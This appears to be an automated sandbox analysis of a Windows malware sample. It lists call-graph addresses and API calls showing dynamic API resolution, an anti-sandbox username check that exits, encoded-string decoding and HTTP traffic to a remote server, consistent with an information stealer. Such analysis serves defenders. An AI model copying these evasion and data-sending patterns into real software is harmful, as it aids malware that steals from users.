26984 402d26 26983->26984 26985 4045c0 34 API calls 26984->26985 26986 402d3f 26985->26986 26987 4045c0 34 API calls 26986->26987 26988 402d58 26987->26988 26989 4045c0 34 API calls 26988->26989 26990 402d71 26989->26990 26991 4045c0 34 API calls 26990->26991 26992 402d8a 26991->26992 26993 4045c0 34 API calls 26992->26993 26994 402da3 26993->26994 26995 4045c0 34 API calls 26994->26995 26996 402dbc 26995->26996 26997 4045c0 34 API calls 26996->26997 26998 402dd5 26997->26998 26999 4045c0 34 API calls 26998->26999 27000 402dee 26999->27000 27001 4045c0 34 API calls 27000->27001 27002 402e07 27001->27002 27003 4045c0 34 API calls 27002->27003 27004 402e20 27003->27004 27005 4045c0 34 API calls 27004->27005 27006 402e39 27005->27006 27007 4045c0 34 API calls 27006->27007 27008 402e52 27007->27008 27009 4045c0 34 API calls 27008->27009 27010 402e6b 27009->27010 27011 4045c0 34 API calls 27010->27011 27012 402e84 27011->27012 27013 4045c0 34 API calls 27012->27013 27014 402e9d 27013->27014 27015 4045c0 34 API calls 27014->27015 27016 402eb6 27015->27016 27017 4045c0 34 API calls 27016->27017 27018 402ecf 27017->27018 27019 4045c0 34 API calls 27018->27019 27020 402ee8 27019->27020 27021 4045c0 34 API calls 27020->27021 27022 402f01 27021->27022 27023 4045c0 34 API calls 27022->27023 27024 402f1a 27023->27024 27025 4045c0 34 API calls 27024->27025 27026 402f33 27025->27026 27027 4045c0 34 API calls 27026->27027 27028 402f4c 27027->27028 27029 4045c0 34 API calls 27028->27029 27030 402f65 27029->27030 27031 4045c0 34 API calls 27030->27031 27032 402f7e 27031->27032 27033 4045c0 34 API calls 27032->27033 27034 402f97 27033->27034 27035 4045c0 34 API calls 27034->27035 27036 402fb0 27035->27036 27037 4045c0 34 API calls 27036->27037 27038 402fc9 27037->27038 27039 4045c0 34 API calls 27038->27039 27040 402fe2 27039->27040 27041 4045c0 34 API calls 27040->27041 27042 402ffb 27041->27042 27043 4045c0 34 API calls 27042->27043 27044 403014 27043->27044 27045 4045c0 34 API calls 27044->27045 27046 40302d 27045->27046 27047 4045c0 34 API calls 27046->27047 27048 403046 27047->27048 27049 4045c0 34 API calls 27048->27049 27050 40305f 27049->27050 27051 4045c0 34 API calls 27050->27051 27052 403078 27051->27052 27053 4045c0 34 API calls 27052->27053 27054 403091 27053->27054 27055 4045c0 34 API calls 27054->27055 27056 4030aa 27055->27056 27057 4045c0 34 API calls 27056->27057 27058 4030c3 27057->27058 27059 4045c0 34 API calls 27058->27059 27060 4030dc 27059->27060 27061 4045c0 34 API calls 27060->27061 27062 4030f5 27061->27062 27063 4045c0 34 API calls 27062->27063 27064 40310e 27063->27064 27065 4045c0 34 API calls 27064->27065 27066 403127 27065->27066 27067 4045c0 34 API calls 27066->27067 27068 403140 27067->27068 27069 4045c0 34 API calls 27068->27069 27070 403159 27069->27070 27071 4045c0 34 API calls 27070->27071 27072 403172 27071->27072 27073 4045c0 34 API calls 27072->27073 27074 40318b 27073->27074 27075 4045c0 34 API calls 27074->27075 27076 4031a4 27075->27076 27077 4045c0 34 API calls 27076->27077 27078 4031bd 27077->27078 27079 4045c0 34 API calls 27078->27079 27080 4031d6 27079->27080 27081 4045c0 34 API calls 27080->27081 27082 4031ef 27081->27082 27083 4045c0 34 API calls 27082->27083 27084 403208 27083->27084 27085 4045c0 34 API calls 27084->27085 27086 403221 27085->27086 27087 4045c0 34 API calls 27086->27087 27088 40323a 27087->27088 27089 4045c0 34 API calls 27088->27089 27090 403253 27089->27090 27091 4045c0 34 API calls 27090->27091 27092 40326c 27091->27092 27093 4045c0 34 API calls 27092->27093 27094 403285 27093->27094 27095 4045c0 34 API calls 27094->27095 27096 40329e 27095->27096 27097 4045c0 34 API calls 27096->27097 27098 4032b7 27097->27098 27099 4045c0 34 API calls 27098->27099 27100 4032d0 27099->27100 27101 4045c0 34 API calls 27100->27101 27102 4032e9 27101->27102 27103 4045c0 34 API calls 27102->27103 27104 403302 27103->27104 27105 4045c0 34 API calls 27104->27105 27106 40331b 27105->27106 27107 4045c0 34 API calls 27106->27107 27108 403334 27107->27108 27109 4045c0 34 API calls 27108->27109 27110 40334d 27109->27110 27111 4045c0 34 API calls 27110->27111 27112 403366 27111->27112 27113 4045c0 34 API calls 27112->27113 27114 40337f 27113->27114 27115 4045c0 34 API calls 27114->27115 27116 403398 27115->27116 27117 4045c0 34 API calls 27116->27117 27118 4033b1 27117->27118 27119 4045c0 34 API calls 27118->27119 27120 4033ca 27119->27120 27121 4045c0 34 API calls 27120->27121 27122 4033e3 27121->27122 27123 4045c0 34 API calls 27122->27123 27124 4033fc 27123->27124 27125 4045c0 34 API calls 27124->27125 27126 403415 27125->27126 27127 4045c0 34 API calls 27126->27127 27128 40342e 27127->27128 27129 4045c0 34 API calls 27128->27129 27130 403447 27129->27130 27131 4045c0 34 API calls 27130->27131 27132 403460 27131->27132 27133 4045c0 34 API calls 27132->27133 27134 403479 27133->27134 27135 4045c0 34 API calls 27134->27135 27136 403492 27135->27136 27137 4045c0 34 API calls 27136->27137 27138 4034ab 27137->27138 27139 4045c0 34 API calls 27138->27139 27140 4034c4 27139->27140 27141 4045c0 34 API calls 27140->27141 27142 4034dd 27141->27142 27143 4045c0 34 API calls 27142->27143 27144 4034f6 27143->27144 27145 4045c0 34 API calls 27144->27145 27146 40350f 27145->27146 27147 4045c0 34 API calls 27146->27147 27148 403528 27147->27148 27149 4045c0 34 API calls 27148->27149 27150 403541 27149->27150 27151 4045c0 34 API calls 27150->27151 27152 40355a 27151->27152 27153 4045c0 34 API calls 27152->27153 27154 403573 27153->27154 27155 4045c0 34 API calls 27154->27155 27156 40358c 27155->27156 27157 4045c0 34 API calls 27156->27157 27158 4035a5 27157->27158 27159 4045c0 34 API calls 27158->27159 27160 4035be 27159->27160 27161 4045c0 34 API calls 27160->27161 27162 4035d7 27161->27162 27163 4045c0 34 API calls 27162->27163 27164 4035f0 27163->27164 27165 4045c0 34 API calls 27164->27165 27166 403609 27165->27166 27167 4045c0 34 API calls 27166->27167 27168 403622 27167->27168 27169 4045c0 34 API calls 27168->27169 27170 40363b 27169->27170 27171 4045c0 34 API calls 27170->27171 27172 403654 27171->27172 27173 4045c0 34 API calls 27172->27173 27174 40366d 27173->27174 27175 4045c0 34 API calls 27174->27175 27176 403686 27175->27176 27177 4045c0 34 API calls 27176->27177 27178 40369f 27177->27178 27179 4045c0 34 API calls 27178->27179 27180 4036b8 27179->27180 27181 4045c0 34 API calls 27180->27181 27182 4036d1 27181->27182 27183 4045c0 34 API calls 27182->27183 27184 4036ea 27183->27184 27185 4045c0 34 API calls 27184->27185 27186 403703 27185->27186 27187 4045c0 34 API calls 27186->27187 27188 40371c 27187->27188 27189 4045c0 34 API calls 27188->27189 27190 403735 27189->27190 27191 4045c0 34 API calls 27190->27191 27192 40374e 27191->27192 27193 4045c0 34 API calls 27192->27193 27194 403767 27193->27194 27195 4045c0 34 API calls 27194->27195 27196 403780 27195->27196 27197 4045c0 34 API calls 27196->27197 27198 403799 27197->27198 27199 4045c0 34 API calls 27198->27199 27200 4037b2 27199->27200 27201 4045c0 34 API calls 27200->27201 27202 4037cb 27201->27202 27203 4045c0 34 API calls 27202->27203 27204 4037e4 27203->27204 27205 4045c0 34 API calls 27204->27205 27206 4037fd 27205->27206 27207 4045c0 34 API calls 27206->27207 27208 403816 27207->27208 27209 4045c0 34 API calls 27208->27209 27210 40382f 27209->27210 27211 4045c0 34 API calls 27210->27211 27212 403848 27211->27212 27213 4045c0 34 API calls 27212->27213 27214 403861 27213->27214 27215 4045c0 34 API calls 27214->27215 27216 40387a 27215->27216 27217 4045c0 34 API calls 27216->27217 27218 403893 27217->27218 27219 4045c0 34 API calls 27218->27219 27220 4038ac 27219->27220 27221 4045c0 34 API calls 27220->27221 27222 4038c5 27221->27222 27223 4045c0 34 API calls 27222->27223 27224 4038de 27223->27224 27225 4045c0 34 API calls 27224->27225 27226 4038f7 27225->27226 27227 4045c0 34 API calls 27226->27227 27228 403910 27227->27228 27229 4045c0 34 API calls 27228->27229 27230 403929 27229->27230 27231 4045c0 34 API calls 27230->27231 27232 403942 27231->27232 27233 4045c0 34 API calls 27232->27233 27234 40395b 27233->27234 27235 4045c0 34 API calls 27234->27235 27236 403974 27235->27236 27237 4045c0 34 API calls 27236->27237 27238 40398d 27237->27238 27239 4045c0 34 API calls 27238->27239 27240 4039a6 27239->27240 27241 4045c0 34 API calls 27240->27241 27242 4039bf 27241->27242 27243 4045c0 34 API calls 27242->27243 27244 4039d8 27243->27244 27245 4045c0 34 API calls 27244->27245 27246 4039f1 27245->27246 27247 4045c0 34 API calls 27246->27247 27248 403a0a 27247->27248 27249 4045c0 34 API calls 27248->27249 27250 403a23 27249->27250 27251 4045c0 34 API calls 27250->27251 27252 403a3c 27251->27252 27253 4045c0 34 API calls 27252->27253 27254 403a55 27253->27254 27255 4045c0 34 API calls 27254->27255 27256 403a6e 27255->27256 27257 4045c0 34 API calls 27256->27257 27258 403a87 27257->27258 27259 4045c0 34 API calls 27258->27259 27260 403aa0 27259->27260 27261 4045c0 34 API calls 27260->27261 27262 403ab9 27261->27262 27263 4045c0 34 API calls 27262->27263 27264 403ad2 27263->27264 27265 4045c0 34 API calls 27264->27265 27266 403aeb 27265->27266 27267 4045c0 34 API calls 27266->27267 27268 403b04 27267->27268 27269 4045c0 34 API calls 27268->27269 27270 403b1d 27269->27270 27271 4045c0 34 API calls 27270->27271 27272 403b36 27271->27272 27273 4045c0 34 API calls 27272->27273 27274 403b4f 27273->27274 27275 4045c0 34 API calls 27274->27275 27276 403b68 27275->27276 27277 4045c0 34 API calls 27276->27277 27278 403b81 27277->27278 27279 4045c0 34 API calls 27278->27279 27280 403b9a 27279->27280 27281 4045c0 34 API calls 27280->27281 27282 403bb3 27281->27282 27283 4045c0 34 API calls 27282->27283 27284 403bcc 27283->27284 27285 4045c0 34 API calls 27284->27285 27286 403be5 27285->27286 27287 4045c0 34 API calls 27286->27287 27288 403bfe 27287->27288 27289 4045c0 34 API calls 27288->27289 27290 403c17 27289->27290 27291 4045c0 34 API calls 27290->27291 27292 403c30 27291->27292 27293 4045c0 34 API calls 27292->27293 27294 403c49 27293->27294 27295 4045c0 34 API calls 27294->27295 27296 403c62 27295->27296 27297 4045c0 34 API calls 27296->27297 27298 403c7b 27297->27298 27299 4045c0 34 API calls 27298->27299 27300 403c94 27299->27300 27301 4045c0 34 API calls 27300->27301 27302 403cad 27301->27302 27303 4045c0 34 API calls 27302->27303 27304 403cc6 27303->27304 27305 4045c0 34 API calls 27304->27305 27306 403cdf 27305->27306 27307 4045c0 34 API calls 27306->27307 27308 403cf8 27307->27308 27309 4045c0 34 API calls 27308->27309 27310 403d11 27309->27310 27311 4045c0 34 API calls 27310->27311 27312 403d2a 27311->27312 27313 4045c0 34 API calls 27312->27313 27314 403d43 27313->27314 27315 4045c0 34 API calls 27314->27315 27316 403d5c 27315->27316 27317 4045c0 34 API calls 27316->27317 27318 403d75 27317->27318 27319 4045c0 34 API calls 27318->27319 27320 403d8e 27319->27320 27321 4045c0 34 API calls 27320->27321 27322 403da7 27321->27322 27323 4045c0 34 API calls 27322->27323 27324 403dc0 27323->27324 27325 4045c0 34 API calls 27324->27325 27326 403dd9 27325->27326 27327 4045c0 34 API calls 27326->27327 27328 403df2 27327->27328 27329 4045c0 34 API calls 27328->27329 27330 403e0b 27329->27330 27331 4045c0 34 API calls 27330->27331 27332 403e24 27331->27332 27333 4045c0 34 API calls 27332->27333 27334 403e3d 27333->27334 27335 4045c0 34 API calls 27334->27335 27336 403e56 27335->27336 27337 4045c0 34 API calls 27336->27337 27338 403e6f 27337->27338 27339 4045c0 34 API calls 27338->27339 27340 403e88 27339->27340 27341 4045c0 34 API calls 27340->27341 27342 403ea1 27341->27342 27343 4045c0 34 API calls 27342->27343 27344 403eba 27343->27344 27345 4045c0 34 API calls 27344->27345 27346 403ed3 27345->27346 27347 4045c0 34 API calls 27346->27347 27348 403eec 27347->27348 27349 4045c0 34 API calls 27348->27349 27350 403f05 27349->27350 27351 4045c0 34 API calls 27350->27351 27352 403f1e 27351->27352 27353 4045c0 34 API calls 27352->27353 27354 403f37 27353->27354 27355 4045c0 34 API calls 27354->27355 27356 403f50 27355->27356 27357 4045c0 34 API calls 27356->27357 27358 403f69 27357->27358 27359 4045c0 34 API calls 27358->27359 27360 403f82 27359->27360 27361 4045c0 34 API calls 27360->27361 27362 403f9b 27361->27362 27363 4045c0 34 API calls 27362->27363 27364 403fb4 27363->27364 27365 4045c0 34 API calls 27364->27365 27366 403fcd 27365->27366 27367 4045c0 34 API calls 27366->27367 27368 403fe6 27367->27368 27369 4045c0 34 API calls 27368->27369 27370 403fff 27369->27370 27371 4045c0 34 API calls 27370->27371 27372 404018 27371->27372 27373 4045c0 34 API calls 27372->27373 27374 404031 27373->27374 27375 4045c0 34 API calls 27374->27375 27376 40404a 27375->27376 27377 4045c0 34 API calls 27376->27377 27378 404063 27377->27378 27379 4045c0 34 API calls 27378->27379 27380 40407c 27379->27380 27381 4045c0 34 API calls 27380->27381 27382 404095 27381->27382 27383 4045c0 34 API calls 27382->27383 27384 4040ae 27383->27384 27385 4045c0 34 API calls 27384->27385 27386 4040c7 27385->27386 27387 4045c0 34 API calls 27386->27387 27388 4040e0 27387->27388 27389 4045c0 34 API calls 27388->27389 27390 4040f9 27389->27390 27391 4045c0 34 API calls 27390->27391 27392 404112 27391->27392 27393 4045c0 34 API calls 27392->27393 27394 40412b 27393->27394 27395 4045c0 34 API calls 27394->27395 27396 404144 27395->27396 27397 4045c0 34 API calls 27396->27397 27398 40415d 27397->27398 27399 4045c0 34 API calls 27398->27399 27400 404176 27399->27400 27401 4045c0 34 API calls 27400->27401 27402 40418f 27401->27402 27403 4045c0 34 API calls 27402->27403 27404 4041a8 27403->27404 27405 4045c0 34 API calls 27404->27405 27406 4041c1 27405->27406 27407 4045c0 34 API calls 27406->27407 27408 4041da 27407->27408 27409 4045c0 34 API calls 27408->27409 27410 4041f3 27409->27410 27411 4045c0 34 API calls 27410->27411 27412 40420c 27411->27412 27413 4045c0 34 API calls 27412->27413 27414 404225 27413->27414 27415 4045c0 34 API calls 27414->27415 27416 40423e 27415->27416 27417 4045c0 34 API calls 27416->27417 27418 404257 27417->27418 27419 4045c0 34 API calls 27418->27419 27420 404270 27419->27420 27421 4045c0 34 API calls 27420->27421 27422 404289 27421->27422 27423 4045c0 34 API calls 27422->27423 27424 4042a2 27423->27424 27425 4045c0 34 API calls 27424->27425 27426 4042bb 27425->27426 27427 4045c0 34 API calls 27426->27427 27428 4042d4 27427->27428 27429 4045c0 34 API calls 27428->27429 27430 4042ed 27429->27430 27431 4045c0 34 API calls 27430->27431 27432 404306 27431->27432 27433 4045c0 34 API calls 27432->27433 27434 40431f 27433->27434 27435 4045c0 34 API calls 27434->27435 27436 404338 27435->27436 27437 4045c0 34 API calls 27436->27437 27438 404351 27437->27438 27439 4045c0 34 API calls 27438->27439 27440 40436a 27439->27440 27441 4045c0 34 API calls 27440->27441 27442 404383 27441->27442 27443 4045c0 34 API calls 27442->27443 27444 40439c 27443->27444 27445 4045c0 34 API calls 27444->27445 27446 4043b5 27445->27446 27447 4045c0 34 API calls 27446->27447 27448 4043ce 27447->27448 27449 4045c0 34 API calls 27448->27449 27450 4043e7 27449->27450 27451 4045c0 34 API calls 27450->27451 27452 404400 27451->27452 27453 4045c0 34 API calls 27452->27453 27454 404419 27453->27454 27455 4045c0 34 API calls 27454->27455 27456 404432 27455->27456 27457 4045c0 34 API calls 27456->27457 27458 40444b 27457->27458 27459 4045c0 34 API calls 27458->27459 27460 404464 27459->27460 27461 4045c0 34 API calls 27460->27461 27462 40447d 27461->27462 27463 4045c0 34 API calls 27462->27463 27464 404496 27463->27464 27465 4045c0 34 API calls 27464->27465 27466 4044af 27465->27466 27467 4045c0 34 API calls 27466->27467 27468 4044c8 27467->27468 27469 4045c0 34 API calls 27468->27469 27470 4044e1 27469->27470 27471 4045c0 34 API calls 27470->27471 27472 4044fa 27471->27472 27473 4045c0 34 API calls 27472->27473 27474 404513 27473->27474 27475 4045c0 34 API calls 27474->27475 27476 40452c 27475->27476 27477 4045c0 34 API calls 27476->27477 27478 404545 27477->27478 27479 4045c0 34 API calls 27478->27479 27480 40455e 27479->27480 27481 4045c0 34 API calls 27480->27481 27482 404577 27481->27482 27483 4045c0 34 API calls 27482->27483 27484 404590 27483->27484 27485 4045c0 34 API calls 27484->27485 27486 4045a9 27485->27486 27487 419c10 27486->27487 27488 419c20 43 API calls 27487->27488 27489 41a036 8 API calls 27487->27489 27488->27489 27490 41a146 27489->27490 27491 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27489->27491 27492 41a153 8 API calls 27490->27492 27493 41a216 27490->27493 27491->27490 27492->27493 27494 41a298 27493->27494 27495 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27493->27495 27496 41a2a5 6 API calls 27494->27496 27497 41a337 27494->27497 27495->27494 27496->27497 27498 41a344 9 API calls 27497->27498 27499 41a41f 27497->27499 27498->27499 27500 41a4a2 27499->27500 27501 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27499->27501 27502 41a4ab GetProcAddress GetProcAddress 27500->27502 27503 41a4dc 27500->27503 27501->27500 27502->27503 27504 41a515 27503->27504 27505 41a4e5 GetProcAddress GetProcAddress 27503->27505 27506 41a612 27504->27506 27507 41a522 10 API calls 27504->27507 27505->27504 27508 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27506->27508 27509 41a67d 27506->27509 27507->27506 27508->27509 27510 41a686 GetProcAddress 27509->27510 27511 41a69e 27509->27511 27510->27511 27512 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27511->27512 27513 415ca3 27511->27513 27512->27513 27514 401590 27513->27514 27788 401670 27514->27788 27517 41a7a0 lstrcpy 27518 4015b5 27517->27518 27519 41a7a0 lstrcpy 27518->27519 27520 4015c7 27519->27520 27521 41a7a0 lstrcpy 27520->27521 27522 4015d9 27521->27522 27523 41a7a0 lstrcpy 27522->27523 27524 401663 27523->27524 27525 415510 27524->27525 27526 415521 27525->27526 27527 41a820 2 API calls 27526->27527 27528 41552e 27527->27528 27529 41a820 2 API calls 27528->27529 27530 41553b 27529->27530 27531 41a820 2 API calls 27530->27531 27532 415548 27531->27532 27533 41a740 lstrcpy 27532->27533 27534 415555 27533->27534 27535 41a740 lstrcpy 27534->27535 27536 415562 27535->27536 27537 41a740 lstrcpy 27536->27537 27538 41556f 27537->27538 27539 41a740 lstrcpy 27538->27539 27578 41557c 27539->27578 27540 415643 StrCmpCA 27540->27578 27541 4156a0 StrCmpCA 27542 4157dc 27541->27542 27541->27578 27543 41a8a0 lstrcpy 27542->27543 27544 4157e8 27543->27544 27545 41a820 2 API calls 27544->27545 27547 4157f6 27545->27547 27546 41a820 lstrlenA lstrcpy 27546->27578 27549 41a820 2 API calls 27547->27549 27548 415856 StrCmpCA 27550 415991 27548->27550 27548->27578 27552 415805 27549->27552 27551 41a8a0 lstrcpy 27550->27551 27553 41599d 27551->27553 27554 401670 lstrcpy 27552->27554 27555 41a820 2 API calls 27553->27555 27575 415811 27554->27575 27556 4159ab 27555->27556 27558 41a820 2 API calls 27556->27558 27557 415a0b StrCmpCA 27559 415a16 Sleep 27557->27559 27560 415a28 27557->27560 27562 4159ba 27558->27562 27559->27578 27563 41a8a0 lstrcpy 27560->27563 27561 41a740 lstrcpy 27561->27578 27564 401670 lstrcpy 27562->27564 27565 415a34 27563->27565 27564->27575 27567 41a820 2 API calls 27565->27567 27566 401590 lstrcpy 27566->27578 27568 415a43 27567->27568 27571 41a820 2 API calls 27568->27571 27569 4152c0 29 API calls 27569->27578 27570 4151f0 23 API calls 27570->27578 27573 415a52 27571->27573 27572 41578a StrCmpCA 27572->27578 27574 401670 lstrcpy 27573->27574 27574->27575 27575->26633 27576 41593f StrCmpCA 27576->27578 27577 41a7a0 lstrcpy 27577->27578 27578->27540 27578->27541 27578->27546 27578->27548 27578->27557 27578->27561 27578->27566 27578->27569 27578->27570 27578->27572 27578->27576 27578->27577 27579 41a8a0 lstrcpy 27578->27579 27579->27578 27581 417553 GetVolumeInformationA 27580->27581 27582 41754c 27580->27582 27583 417591 27581->27583 27582->27581 27584 4175fc GetProcessHeap HeapAlloc 27583->27584 27585 417619 27584->27585 27586 417628 wsprintfA 27584->27586 27588 41a740 lstrcpy 27585->27588 27587 41a740 lstrcpy 27586->27587 27589 415da7 27587->27589 27588->27589 27589->26654 27591 41a7a0 lstrcpy 27590->27591 27592 404899 27591->27592 27797 4047b0 27592->27797 27594 4048a5 27595 41a740 lstrcpy 27594->27595 27596 4048d7 27595->27596 27597 41a740 lstrcpy 27596->27597 27598 4048e4 27597->27598 27599 41a740 lstrcpy 27598->27599 27600 4048f1 27599->27600 27601 41a740 lstrcpy 27600->27601 27602 4048fe 27601->27602 27603 41a740 lstrcpy 27602->27603 27604 40490b InternetOpenA StrCmpCA 27603->27604 27605 404944 27604->27605 27606 404ecb InternetCloseHandle 27605->27606 27805 418b60 27605->27805 27608 404ee8 27606->27608 27820 409ac0 CryptStringToBinaryA 27608->27820 27609 404963 27813 41a920 27609->27813 27613 404976 27614 41a8a0 lstrcpy 27613->27614 27619 40497f 27614->27619 27615 41a820 2 API calls 27616 404f05 27615->27616 27617 41a9b0 4 API calls 27616->27617 27620 404f1b 27617->27620 27618 404f27 moneypunct 27621 41a7a0 lstrcpy 27618->27621 27623 41a9b0 4 API calls 27619->27623 27622 41a8a0 lstrcpy 27620->27622 27634 404f57 27621->27634 27622->27618 27624 4049a9 27623->27624 27625 41a8a0 lstrcpy 27624->27625 27626 4049b2 27625->27626 27627 41a9b0 4 API calls 27626->27627 27628 4049d1 27627->27628 27629 41a8a0 lstrcpy 27628->27629 27630 4049da 27629->27630 27631 41a920 3 API calls 27630->27631 27632 4049f8 27631->27632 27633 41a8a0 lstrcpy 27632->27633 27635 404a01 27633->27635 27634->26657 27636 41a9b0 4 API calls 27635->27636 27637 404a20 27636->27637 27638 41a8a0 lstrcpy 27637->27638 27639 404a29 27638->27639 27640 41a9b0 4 API calls 27639->27640 27641 404a48 27640->27641 27642 41a8a0 lstrcpy 27641->27642 27643 404a51 27642->27643 27644 41a9b0 4 API calls 27643->27644 27645 404a7d 27644->27645 27646 41a920 3 API calls 27645->27646 27647 404a84 27646->27647 27648 41a8a0 lstrcpy 27647->27648 27649 404a8d 27648->27649 27650 404aa3 InternetConnectA 27649->27650 27650->27606 27651 404ad3 HttpOpenRequestA 27650->27651 27653 404b28 27651->27653 27654 404ebe InternetCloseHandle 27651->27654 27655 41a9b0 4 API calls 27653->27655 27654->27606 27656 404b3c 27655->27656 27657 41a8a0 lstrcpy 27656->27657 27658 404b45 27657->27658 27659 41a920 3 API calls 27658->27659 27660 404b63 27659->27660 27661 41a8a0 lstrcpy 27660->27661 27662 404b6c 27661->27662 27663 41a9b0 4 API calls 27662->27663 27664 404b8b 27663->27664 27665 41a8a0 lstrcpy 27664->27665 27666 404b94 27665->27666 27667 41a9b0 4 API calls 27666->27667 27668 404bb5 27667->27668 27669 41a8a0 lstrcpy 27668->27669 27670 404bbe 27669->27670 27671 41a9b0 4 API calls 27670->27671 27672 404bde 27671->27672 27673 41a8a0 lstrcpy 27672->27673 27674 404be7 27673->27674 27675 41a9b0 4 API calls 27674->27675 27676 404c06 27675->27676 27677 41a8a0 lstrcpy 27676->27677 27678 404c0f 27677->27678 27679 41a920 3 API calls 27678->27679 27680 404c2d 27679->27680 27681 41a8a0 lstrcpy 27680->27681 27682 404c36 27681->27682 27683 41a9b0 4 API calls 27682->27683 27684 404c55 27683->27684 27685 41a8a0 lstrcpy 27684->27685 27686 404c5e 27685->27686 27687 41a9b0 4 API calls 27686->27687 27688 404c7d 27687->27688 27689 41a8a0 lstrcpy 27688->27689 27690 404c86 27689->27690 27691 41a920 3 API calls 27690->27691 27692 404ca4 27691->27692 27693 41a8a0 lstrcpy 27692->27693 27694 404cad 27693->27694 27695 41a9b0 4 API calls 27694->27695 27696 404ccc 27695->27696 27697 41a8a0 lstrcpy 27696->27697 27698 404cd5 27697->27698 27699 41a9b0 4 API calls 27698->27699 27700 404cf6 27699->27700 27701 41a8a0 lstrcpy 27700->27701 27702 404cff 27701->27702 27703 41a9b0 4 API calls 27702->27703 27704 404d1f 27703->27704 27705 41a8a0 lstrcpy 27704->27705 27706 404d28 27705->27706 27707 41a9b0 4 API calls 27706->27707 27708 404d47 27707->27708 27709 41a8a0 lstrcpy 27708->27709 27710 404d50 27709->27710 27711 41a920 3 API calls 27710->27711 27712 404d6e 27711->27712 27713 41a8a0 lstrcpy 27712->27713 27714 404d77 27713->27714 27715 41a740 lstrcpy 27714->27715 27716 404d92 27715->27716 27717 41a920 3 API calls 27716->27717 27718 404db3 27717->27718 27719 41a920 3 API calls 27718->27719 27720 404dba 27719->27720 27721 41a8a0 lstrcpy 27720->27721 27722 404dc6 27721->27722 27723 404de7 lstrlenA 27722->27723 27724 404dfa 27723->27724 27725 404e03 lstrlenA 27724->27725 27819 41aad0 27725->27819 27727 404e13 HttpSendRequestA 27728 404e32 InternetReadFile 27727->27728 27729 404e67 InternetCloseHandle 27728->27729 27734 404e5e 27728->27734 27732 41a800 27729->27732 27731 41a9b0 4 API calls 27731->27734 27732->27654 27733 41a8a0 lstrcpy 27733->27734 27734->27728 27734->27729 27734->27731 27734->27733 27829 41aad0 27735->27829 27737 4117c4 StrCmpCA 27738 4117d7 27737->27738 27739 4117cf ExitProcess 27737->27739 27740 4117e7 strtok_s 27738->27740 27743 4117f4 27740->27743 27741 4119c2 27741->26659 27742 41199e strtok_s 27742->27743 27743->27741 27743->27742 27744 4118ad StrCmpCA 27743->27744 27745 4118cf StrCmpCA 27743->27745 27746 4118f1 StrCmpCA 27743->27746 27747 411951 StrCmpCA 27743->27747 27748 411970 StrCmpCA 27743->27748 27749 411913 StrCmpCA 27743->27749 27750 411932 StrCmpCA 27743->27750 27751 41185d StrCmpCA 27743->27751 27752 41187f StrCmpCA 27743->27752 27753 41a820 lstrlenA lstrcpy 27743->27753 27754 41a820 2 API calls 27743->27754 27744->27743 27745->27743 27746->27743 27747->27743 27748->27743 27749->27743 27750->27743 27751->27743 27752->27743 27753->27743 27754->27742 27755->26665 27756->26667 27757->26673 27758->26675 27759->26681 27760->26683 27761->26687 27762->26691 27763->26695 27764->26701 27765->26703 27766->26707 27767->26720 27768->26725 27769->26724 27770->26721 27771->26724 27772->26741 27773->26727 27774->26731 27775->26732 27776->26737 27777->26743 27778->26745 27779->26752 27780->26754 27781->26778 27782->26781 27783->26788 27784->26777 27785->26788 27786->26791 27789 41a7a0 lstrcpy 27788->27789 27790 401683 27789->27790 27791 41a7a0 lstrcpy 27790->27791 27792 401695 27791->27792 27793 41a7a0 lstrcpy 27792->27793 27794 4016a7 27793->27794 27795 41a7a0 lstrcpy 27794->27795 27796 4015a3 27795->27796 27796->27517 27825 401030 27797->27825 27801 404838 lstrlenA 27828 41aad0 27801->27828 27803 404848 InternetCrackUrlA 27804 404867 27803->27804 27804->27594 27806 41a740 lstrcpy 27805->27806 27807 418b74 27806->27807 27808 41a740 lstrcpy 27807->27808 27809 418b82 GetSystemTime 27808->27809 27811 418b99 27809->27811 27810 41a7a0 lstrcpy 27812 418bfc 27810->27812 27811->27810 27812->27609 27815 41a931 27813->27815 27814 41a988 27816 41a7a0 lstrcpy 27814->27816 27815->27814 27817 41a968 lstrcpy lstrcatA 27815->27817 27818 41a994 27816->27818 27817->27814 27818->27613 27819->27727 27821 409af9 LocalAlloc 27820->27821 27822 404eee 27820->27822 27821->27822 27823 409b14 CryptStringToBinaryA 27821->27823 27822->27615 27822->27618 27823->27822 27824 409b39 LocalFree 27823->27824 27824->27822 27826 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27825->27826 27827 41aad0 27826->27827 27827->27801 27828->27803 27829->27737 27953 416ab1 902 API calls 27922 4069f3 7 API calls 27895 22f0297 131 API calls 27896 22fae93 43 API calls 2 library calls 27955 41cafe 219 API calls 4 library calls 27957 22fcce9 162 API calls ___crtGetStringTypeA 27991 22f19e7 StrCmpCA ExitProcess strtok_s strtok_s 27992 22f35e4 9 API calls 26398 401190 26405 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26398->26405 26400 40119e 26401 4011cc 26400->26401 26407 417850 GetProcessHeap HeapAlloc GetUserNameA 26400->26407 26403 4011b7 26403->26401 26404 4011c4 ExitProcess 26403->26404 26406 417939 26405->26406 26406->26400 26408 4178c3 26407->26408 26408->26403 27958 22f30f9 7 API calls 27959 41ce9f 69 API calls __amsg_exit 27960 22ef8f1 32 API calls 27899 4088a4 RaiseException task __CxxThrowException@8 27900 4180a5 GetProcessHeap HeapFree 27924 22f13c7 strtok_s strtok_s 27926 41b9b0 RtlUnwind 27965 22f3823 8 API calls 27967 22f30d0 9 API calls

                              Control-flow Graph

                              APIs
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
